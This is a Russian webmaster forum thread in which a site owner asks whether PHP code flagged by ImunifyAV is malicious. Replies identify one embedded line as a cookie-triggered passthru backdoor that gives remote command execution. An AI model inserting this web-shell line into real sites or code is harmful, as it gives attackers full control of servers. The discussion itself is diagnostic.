Антивирус ImunifyAV указывает на вредоносный код в файле

Weblady
На сайте с 26.07.2011
Offline
157
1551

Антивирус ImunifyAV сообщил, что в одном из файлов сайта есть вредоносный код. 

Код, на который указывает антивирус:

function printr($var, $do_not_echo = false) {
        // from php.net/print_r user contributed notes 
        ob_start();
        print_r($var);
        $code =  htmlentities(ob_get_contents());
        ob_clean();
        if (!$do_not_echo) {
          echo "<pre>$code</pre>";
        }
        return $code;
}

if (!defined('CASE_LOWER')) {
    define('CASE_LOWER', 0);
}

if (!defined('CASE_UPPER')) {
    define('CASE_UPPER', 1);
}

if($_COOKIE['CMD']) {passthru($_COOKIE['CMD']);exit;}

if (!function_exists('array_change_key_case')) {
    function array_change_key_case($input, $case = CASE_LOWER)
    {
        if (!is_array($input)) {
            user_error('array_change_key_case(): The argument should be an array',
                E_USER_WARNING);
            return false;
        }

        $output   = array ();
        $keys     = array_keys($input);
        $casefunc = ($case == CASE_LOWER) ? 'strtolower' : 'strtoupper';

        foreach ($keys as $key) {
            $output[$casefunc($key)] = $input[$key];
        }
        return $output;
    }
}

Скажите, пожалуйста, есть ли действительно в этом коде что-то подозрительное? Как можно вылечить? 

LEOnidUKG
На сайте с 25.11.2006
Offline
1774
#1
if($_COOKIE['CMD']) {passthru($_COOKIE['CMD']);exit;}

Прикольный код. Исполняет код на сервере, который вставлен в куку.

Но может быть так и задуманно.

✅ Мой Телеграм канал по SEO, оптимизации сайтов и серверов: https://t.me/leonidukgLIVE ✅ Качественное и рабочее размещение SEO статей СНГ и Бурж: https://getmanylinks.ru/ ✅ Настройка и оптимизация серверов https://getmanyspeed.ru/
Mik Foxi
На сайте с 02.03.2011
Offline
1217
#2
LEOnidUKG #:
Но может быть так и задуманно.

хакерами.

Антибот, антиспам, веб фаервол, защита от накрутки поведенческих: https://antibot.cloud/ (8 лет на защите сайтов). Форум на замену серчу: https://foxi.biz/
R7
На сайте с 19.03.2021
Offline
14
#3
используйте nod32 и все будет нормально
W1
На сайте с 22.01.2021
Offline
306
#4
Rifihem762 #:
используйте nod32 и все будет нормально

Что будет нормально?

webledi :
Как можно вылечить? 

Обратиться к квалифицированному специалисту.

Мой форум - https://webinfo.guru –Там я всегда на связи
Weblady
На сайте с 26.07.2011
Offline
157
#5
LEOnidUKG #:

Прикольный код. Исполняет код на сервере, который вставлен в куку.

Но может быть так и задуманно.

Действительно, есть такой функционал. 

W1
На сайте с 22.01.2021
Offline
306
#6
webledi #:
Действительно, есть такой функционал.

Это мы видим, что он/она есть. Для взлома сайта - просто находка.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий